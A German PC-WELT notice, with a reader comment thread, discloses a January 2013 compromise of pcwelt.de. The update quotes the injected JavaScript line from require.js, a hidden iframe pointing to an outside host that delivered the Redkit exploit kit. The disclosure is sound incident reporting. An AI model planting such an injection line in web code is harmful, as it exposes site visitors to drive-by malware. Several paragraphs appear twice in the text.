In eigener Sache
pcwelt.de ist wieder Malware-frei
Die Webseite der PC-WELT, pcwelt.de, wurde am Wochenende angegriffen und zur Verbreitung von Malware missbraucht. Aktueller Stand: Pcwelt.de ist wieder frei von Schädlingen. Wir sind außerdem dabei die Sicherheitslücke zu schließen.
Am Samstag, den 26.01.13, haben die Webmaster der PC-WELT festgestellt, dass die Webseite der PC-Welt zunächst im Browser Chrome eine Malware-Warnung auslöst. Ab zirka 10:00 Uhr erschien auch in Firefox ein Warnhinweis auf Malware, wenn man pcwelt.de aufrufen wollte.
Unsere Techniker begannen sofort mit der Ursachenforschung und haben das Problem identifizieren und die Malware auch beseitigen können. Anschließend haben wir die Seite sofort in den Google Webmaster Tools als bereinigt gemeldet, sodass die Seite www.pcwelt.de ab zirka 22:30 Uhr wieder erreichbar war (für www.pc-welt.de und die RSS-Feeds läuft diese Meldung bei den Google Webmaster Tools derzeit noch).
Ursache für den Warnhinweis war eine manipulierte Javascript-Datei, die eine iFrame-Injection auf allen unseren Seiten auslöste. Die Recherchen der pcwelt.de-Webmaster ergaben, dass dieser Exploit vermutlich seit Freitag auf dem Server ausgenutzt wurde.
Über diese iFrame-Injection wurde dann der entsprechende Schadcode verbreitet. Bisher konnten wir die Lücke für die Attacke noch nicht ausfindig machen. Die bisher analysierten Daten lassen vermuten, dass es sich um eine Drive-by-Attacke handelte, also ein Angriff ohne wirkliche Systematik. Die Technik-Abteilung der PC-WELT sucht derzeit nach weiteren Detailinformationen zu diesem Angriff und ergreift zusätzlich Maßnahmen, um künftig solche Angriffe vermeiden zu können.
Unsere Techniker begannen sofort mit der Ursachenforschung und haben das Problem identifizieren und die Malware auch beseitigen können. Anschließend haben wir die Seite sofort in den Google Webmaster Tools als bereinigt gemeldet, sodass die Seite www.pcwelt.de ab zirka 22:30 Uhr wieder erreichbar war (für www.pc-welt.de und die RSS-Feeds läuft diese Meldung bei den Google Webmaster Tools derzeit noch).
Ursache für den Warnhinweis war eine manipulierte Javascript-Datei, die eine iFrame-Injection auf allen unseren Seiten auslöste. Die Recherchen der pcwelt.de-Webmaster ergaben, dass dieser Exploit vermutlich seit Freitag auf dem Server ausgenutzt wurde.
Über diese iFrame-Injection wurde dann der entsprechende Schadcode verbreitet. Bisher konnten wir die Lücke für die Attacke noch nicht ausfindig machen. Die bisher analysierten Daten lassen vermuten, dass es sich um eine Drive-by-Attacke handelte, also ein Angriff ohne wirkliche Systematik. Die Technik-Abteilung der PC-WELT sucht derzeit nach weiteren Detailinformationen zu diesem Angriff und ergreift zusätzlich Maßnahmen, um künftig solche Angriffe vermeiden zu können.
Update 15:00 Uhr:
Dem Angreifer war es gelungen eine Javascript-Datei (require.js), die wir auf jeder pcwelt.de-Seite mit ausliefern, durch eine (bis dato noch unbekannte) Sicherheitslücke derart zu kompromittieren, dass dieses zusätzliche Stück Javascript-Code sich in der require.js befand:
document.write('<iframe src="http://aod.org.hk/help/index2.php" width=1% height=1%></iframe>');
Diese Zeile JS-Code schreibt direkt unter das öffnende <body>-Tag einen iFrame, der bei jedem Seitenaufruf mit aufgerufen wird, genauer gesagt: dessen Inhalt. Innerhalb dieses iFrames wurde eine Schadsoftware (ein Redkit Exploit Kit) ausgeliefert, das u.a. beispielsweise versucht, die UAC (User Account Control, Benutzerkontensteuerung) von Windows auszuhebeln.
Dieses Verhalten führte dazu, dass Google pcwelt.de als "malicious site" einstufte, wodurch wir bei Google und auch bei https://www.stopbadware.org / als schädlich und Schadcode-verbreitend eingestuft wurden.
Durch einen Whitelisting-Antrag über die Google Webmaster Tools konnten wir die pcwelt.de wieder vom "Vorhang" befreien. Jedoch geht das Domain nach Domain, so dass einzelne Domains von uns von Google noch nicht wieder als sauber eingestuft worden sind, obwohl keine Malware mehr darüber verbreitet wird.
Diese Zeile JS-Code schreibt direkt unter das öffnende <body>-Tag einen iFrame, der bei jedem Seitenaufruf mit aufgerufen wird, genauer gesagt: dessen Inhalt. Innerhalb dieses iFrames wurde eine Schadsoftware (ein Redkit Exploit Kit) ausgeliefert, das u.a. beispielsweise versucht, die UAC (User Account Control, Benutzerkontensteuerung) von Windows auszuhebeln.
Dieses Verhalten führte dazu, dass Google pcwelt.de als "malicious site" einstufte, wodurch wir bei Google und auch bei https://www.stopbadware.org / als schädlich und Schadcode-verbreitend eingestuft wurden.
Durch einen Whitelisting-Antrag über die Google Webmaster Tools konnten wir die pcwelt.de wieder vom "Vorhang" befreien. Jedoch geht das Domain nach Domain, so dass einzelne Domains von uns von Google noch nicht wieder als sauber eingestuft worden sind, obwohl keine Malware mehr darüber verbreitet wird.
28.01.13
Spitze..
zu dem Zeitpunkt war natürlich ein mal in zig Jahren nur kurz kein Antivir drauf. Timing ist alles^^
Aber löblich das ihr euch relativ ausführlich dazu äußert. Manch andere Seite häts jetzt todgeschwiegen.
Naja .. bin mal mein System scannen *sigh*
Hoffentlich hab ich mich nicht infiziert bzw. hoffentlich gräbt sich der Mist dann nicht zu tief ins System ein.
Antwort schreiben
28.01.13
Ich habe es kaum geglaubt, dass jemand die PC-Welt infizieren könnte :(
Zum Glück fand ich aber, dass am nächsten Tag ja auch wieder ein Tag wäre :D Glück gehabt, aber vielleicht hätte das aktuelle Antivir angeschlagen.
Jedenfalls verdient die PC Welt ein dickes Lob für den Umgang mit dem Problem (inklusive offene Berichterstattung)
Antwort schreiben
28.01.13
Seit Freitag besteht das Problem, am Samstag wird es gegen 10:00 Uhr von Google abgeschottet und virustotal und urlquest melden kurz vor Mitternacht Vollzug. Am Sonntag eine Kurzmitteilung im passenden Forumsthread und am Montag kommt dann eine in der Tat erfreulich ausführliche Stellungnahme.
Was ich als "Einäugiger-unter-Sehenden" gerne wüsste: konnte diese Art der Bedrohung die Chrome-Sandbox aushebeln? Chrome hat das Forum übrigens noch angezeigt, nachdem im Firefox längst eine Warnung erschien.
Antwort schreiben
28.01.13
Diese Formulierung ist etwas irreführend und verharmlosend.
Es gibt hier zwei Baustellen.
Nr.1 ist die bisher NICHT identifizierte Lücke auf dem PCW-Server, die die Manipulierung des JavaScripts erlaubte. Die war definitiv GEZIELT und daher sehr wohl SYSTEMATISCH.
Nr. 2 ist die Methode, mit der Besucher über das Exploit infiziert wurden, also eine Drive-by-Infektion. Die ist nur insofern nicht systematisch, als sie auf die breite Masse der Besucher zielt und auf deren schlecht gepflegte PCs, die aufgrund mangelhafter Sicherheitseinstellungen und veralteter Browser-Plugins gefährdet sind.
Das hätte im Artikel deutlicher herausgestellt werden sollen.
Antwort schreiben
28.01.13
Antwort schreiben
28.01.13
Und du verlässt dich dann auf das Ergebnis? YMMD.
Antwort schreiben
28.01.13
Warum nicht? Laut Tests schneidet Bitdefender etwas besser als Avira ab (was ich ewig drauf hatte).
Oder meinst du weil es vermutlich relativ unsinnig ist von einem potenziell infizierten System aus zu scannen?
Werde die Nacht eh Desinfect oder vergleichbares von USB-Stick durchlaufen lassen. Sicher ist sicher.
Antwort schreiben
28.01.13
Ein Lob dafür, dass einen ganzen Tag wissentlich Userrechner infiziert wurden? Man hätte die Server auch einfach offline nehmen können, um niemanden weiter zu gefährden bis das Problem behoben ist. Eine offensive Berichterstattung hätte man sich während des Vorfalls gewünscht. Jetzt streut man nur noch Sand in die Augen. Was ich aber mal wieder lerne: diese S*****taktik funktioniert. Man fällt drauf herein.
Antwort schreiben
28.01.13
Erstens das und zweitens übersieht jedes AV mehr als 60% der aktuellen Malware. Und davon kommen [B]täglich (Stand 2011) ca. 1,1 Millionen Varianten neu in Umlauf[/B]. Du kannst also soviel scannen wie du willst (auch via Linux-basierter CD oder Stick) und du erhältst trotzdem kein zuverlässiges Ergebnis. Dies zu akzeptieren fällt den seit 25 Jahren indoktrinierten Usern so schwer, dass sie weiterhin zuerst mal ans AV denken und erst ganz zum Schluss an die Systempflege.
Antwort schreiben
28.01.13
soweit ich weiß muss sich nicht aktiv jemand hinsetzen und eine schwachstelle finden. ein automatisches skript findet die schwachstelle und nutzt sie aus. nur so als info. und mit deiner nummer 2 bestätigst du nur den artikel.
und außerdem bringt ein system-scan durch antivirensoftware sehr wohl etwas. du klingst ziemlich paranoid, um ehrlich zu sein...
Antwort schreiben
28.01.13
War dort - womit muss ich rechnen (gibt es einen Namen für potentielle Infektionen??? nur damit ich gezielt suchen kann) und was sollte ich jetzt tun?
Antwort schreiben
28.01.13
Hm, kann mir nicht vorstellen das die Erkennungsraten wirklich so schlecht sind. Die Heuristik der meisten modernen Antivirenprogramme ist doch schon relativ weit entwickelt.
Alles findet kein Programm, klar. Aber lieber scan ich regelmäßig und find nur nen Teil als gar nicht zu scannen weils ja 'eh nix bringt'.
Was wäre schon die Alternative? Linux oder FreeBSD nutzen?
Aber will keine Diskussion in dieser Richtung lostreten^^
Die üblichen Sicherheitsvorkehrungen halte ich natürlich ein. Updates installieren, nicht als Admin surfen ..ect
Antwort schreiben
28.01.13
Antwort schreiben
28.01.13
Doch, natürlich. Sonst gäbe es keine Exploits für diese. Was du meinst, ist, dass niemand händisch, Fluppe rauchend und Pizza essend dasitzen muss, um den PCW-Server zu kompromittieren. Er muss nur die passende Software auf ihn loslassen. Das ist klar. Aber erstmal muss er wissen, dass das Sinn hat und sich überhaupt für diesen Server entscheiden. Sowas wird nicht durch Würfeln entschieden. Man klopft zwar automatisch diverse Server auf Schwachstellen ab, aber das hat doch durchaus ein System.
Du bist - nimms nicht persönlich - ein Marketing-Opfer.
Ja klar. Aber bin ich auch [B]paranoid genug[/B]? Das ist doch die Frage. :D
Antwort schreiben
28.01.13
Du willst Beispiele? Kannst du haben. Lies aber bitte genau! Es geht keineswegs nur um Flame, Duqu & Co., sondern um weit verbreitete Sachen wie ZeroAccess.
Im Übrigen hilft ein Blick auf die letzten Funde bei www.virustotal.com, wo regelmäßig Malware von nur 2-4 Scannern von 45 erkannt wird und das bleibt oft tage- oder sogar wochenlang so.
[QUOTE=VeryMadScientis][IMG]http://www.pcwelt.de/forum/images/icons/icon5.gif[/IMG] [B]Und jetzt?[/B][/QUOTE]
Jetzt stellst du erstmal fest, welche Versionen deine Browser-Plugins anzeigen. Ist Java (nicht mit JavaScript verwechseln) aktiviert? Das wäre nicht so gut - egal, in welcher Version.
Antwort schreiben
28.01.13
Okay, jetzt habe ich verinnerlicht, warum so gallig reagiert wurde, als ich neulich auf den Zeusreiniger von bitdefender verlinkte... :o
Antwort schreiben
28.01.13
Auf jeden Fall sollte man nicht hämisch sein, wenn es jemanden anderen erwischt. Früher oder später kann es jeden ereilen.
Antwort schreiben
28.01.13
und du bist - nimms nicht persönlich - ein nur vermeintlich gut informierter panikmacher.
als ob sich cracker die mühe machen würden, privatleute mit ihren komplexen malware-varianten zu infizieren. so lange ich kein hochkarätiger entwickler, geschäftsmann oder etc. bin, dann ist das vergebliche mühe und verschwendung von ressourcen. der artikel von heise ist zwar gut, aber nur einen einzigen virenexperten zu interviewen und dann zu pauschalisieren ist nicht fundiert genug und mal wieder nur stimmungsmache.
tagtäglich werden tausende server infiziert und "er" muss nicht wissen, welchen exploit er nutzen kann, weil es eben alles die malware für ihn erledigt.
Antwort schreiben
28.01.13
Da wird exakt dasselbe laufen.
[QUOTE=Mandulis]...und du bist - nimms nicht persönlich - ein nur vermeintlich gut informierter panikmacher.[/QUOTE]
Das siehst du falsch. Wenn ich Panik machen würde, dann müsste ich jedem empfehlen, keine Webseiten mehr zu besuchen, weil sie ja manipuliert sein könnten.
Du schaust zuviele Hacker-Filme. [B]Cracker[/B] ist sowieso der falsche Terminus. Hier gehts um kriminelle, gut organisierte Banden, bei denen Fachleute 40 Stunden pro Woche daran arbeiten, gut funktionierende Malware zu programmieren und gewinnbringend zu vermarkten.
Du unterschätzt wie die meisten Leute diese Szene sträflich.
Antwort schreiben
28.01.13
Sicher. Aber wie ist es jetzt bei mir?
Ich weiß nicht ob sich was schädliches auf meinem Rechner befindet. Ich finde nichts.
Oder wonach und mit was soll ich suchen?
Avira findet nichts und ich möchte nicht unbedingt noch einen Virenscanner draufmachen....ich hab ja einen.
Antwort schreiben
28.01.13
Tatsächlich interessant zu lesen.
Dennoch bieten Virenscanner nach wie vor einen wenigst grundlegenden Schutz gegen Wald&Wiesen Viren. Dann noch das System mit den üblichen Mitteln absichern (sämtliche Scripts im Browser verbieten bzw. Flash & Java gar nicht erst installieren, nicht jeden Mist anklicken, usw.).
Und ja, dann fühl ich mich recht sicher.
Was soll man als normaler Nutzer auch mehr machen?
Hab weder Zeit noch Lust das System so massiv abzuriegeln das es vor lauter "wollen sie das wirklich?" Abfragen kaum noch zu nutzen ist bzw. alle 3 Klicks nach dem Rootpasswort fragt. User sind nun mal faul/gemütlich.
Kann deine Kritik nachvollziehen, aber andere Möglichkeiten gibt es schlicht und ergreifend nicht. Zumindest nicht für den 08/15 User.
Antwort schreiben
28.01.13
Das muss man nicht. Dafür gibt es die Scanner, die von einer Live-CD oder bootfähigem USB-Stick gestartet werden.
Die sollten auch etwas finden, denn der Exploit ist bekannt.
Antwort schreiben
28.01.13
Nein. Sowas wie Wald-und Wiesen-Viren gibts nicht. Es gibt ältere und neuere und brandneue Varianten zu zehntausenden von jeder "HauptSchädlingsart". Die älteren und weniger komplexen werden dann natürlich mit einer höhreren Wahrscheinlichkeit erkannt. Das ist klar. Aber das ist dann immernoch ein Stochern im Nebel. Ich lese in diversen Foren die Klagen der Opfer mit und da ergibt sich dann ein ganz anderes als das erhoffte Bild. A) Es versagen auch kostenpflichtige topaktuelle Scanner immer wieder. B) Auch bekannte Malware (teils seit Jahren im Umlauf) wird übersehen. Da sollte man doch langsam mal die richtigen Schlüsse ziehen.
[B]Grundlegender Schutz[/B] ist nicht ein AV. GRUNDLEGEND ist ein topaktuelles System, das erst [U]gar keine Angriffsfläche[/U] in Form veralteter Plugins und Anwendungen [U]bietet[/U].
Ich hab hier keine Nutzungsprobleme. Das mit dem massiven "Abriegeln bis zur Nutzungsunfähigkeit" ist ein Pseudoargument der Lernresistenten.
Antwort schreiben
28.01.13
Das auch. > http://ulm.ccc.de/ChaosSeminar/2004/12_Personal_Firewalls
link von tempranillo
Antwort schreiben
28.01.13
ich unterschätze hier nichts, mit dem korrekten terminus bin ich auch mehr als nur vertraut. cracker ist die offizielle bezeichnung, aber googlen kannst du ja selbst. und klar, jeder cracker ist in einer organisation
du unterschätzt leider die antiviren-hersteller, Zitat: IRON67. und ein komplett top-aktuelles system ist leider zu keiner zeit möglich - ich hab gedacht, dass du das weißt. anscheinend aber wohl nicht. die größte malware sitzt immer noch vor dem bildschirm.
Antwort schreiben
28.01.13
Weils so in Wikipedia steht? :D Und was ist dann ein Hacker? Das ist semantische Spiegelfechterei. Du gehst hier von unabhängigen Einzelpersonen aus. Wenn Webserver manipuliert und über diverse Weiterleitungen von einem Malware-Server, [B]den ja irgendwer bezahlt und wartet[/B], kompromittiert wird, dann ist das keine Einzeltat eines einzelnen Crackers/Hackers/pöhzen Menschens, sondern eine [B]organisierte Bande[/B].
Ähm...doch..grad jetzt...jetzt nicht...jetzt wieder. Sicherheit ist ein Prozess, kein Produkt. Und natürlich muss man etwas tun, um auf dem Laufenden zu bleiben.
Antwort schreiben